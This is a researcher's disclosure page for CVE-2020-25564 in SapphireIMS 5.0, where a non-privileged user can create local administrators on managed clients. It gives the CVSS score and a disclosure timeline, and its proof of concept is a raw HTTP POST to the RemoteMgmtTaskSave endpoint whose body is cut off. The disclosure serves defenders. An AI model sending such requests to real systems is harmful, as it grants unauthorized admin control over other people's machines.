[CVE-2020-25564] SapphireIMS: Unprivileged user remote command execution (create local admin on clients)

Description

In SapphireIMS 5.0, it is possible to create local administrator on any client with credentials of a non-privileged user by directly accessing RemoteMgmtTaskSave (Automation Tasks) feature.

CVSS 3.0 Base Score

9.9 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)

Researcher

Tanoy Bose

POC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /SapphireIMS/RemoteMgmtTaskSave?mainmenu=yes HTTP/1.1
Host: 192.168.191.48
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1619
Origin: http://192.168.191.48
Connection: close
Referer: http://192.168.191.48/SapphireIMS/TaskConfiguration.jsp?jobTypeId=2017&TaskName=User%20Management&SubTaskName=User%20Account%20Creation&Taskid=1002&mainmenu=yes&SelectedSite=1
Cookie: JSESSIONID=Ni+9V4wVLLkXCe5J0mirr2P4
Upgrade-Insecure-Requests: 1

applicationLogoutTypeOldUI=0&nodupSite=1&mainMenuID=yes&WMIIndex=0&WMITabName=WMI&paramReq1=1&TabList=1&JobIDList=10005&IsparamRequired=1&JobID=10005&TabList=Scheduler&SNMPShowHosts=0&WMIShowHosts=1&WBEMShowHosts=0&SSHShowHosts=0&SelectedSite=1&SelectedTabList=1%2C10005%7C%26%26%7C&param_List=10005%2C1%240%2C1%241%7C%3D%

Vulnerability Tracker]

Disclosure timelines

  • 07 May, 2020 - Vendor informed; failed
  • 16 Sept, 2020 - Cert-CC and Cert-In Informed
Namaste.
You can know about me at my portfolio.
I follow my own Vulnerability Disclosure Policy.
Most of my work is listed here.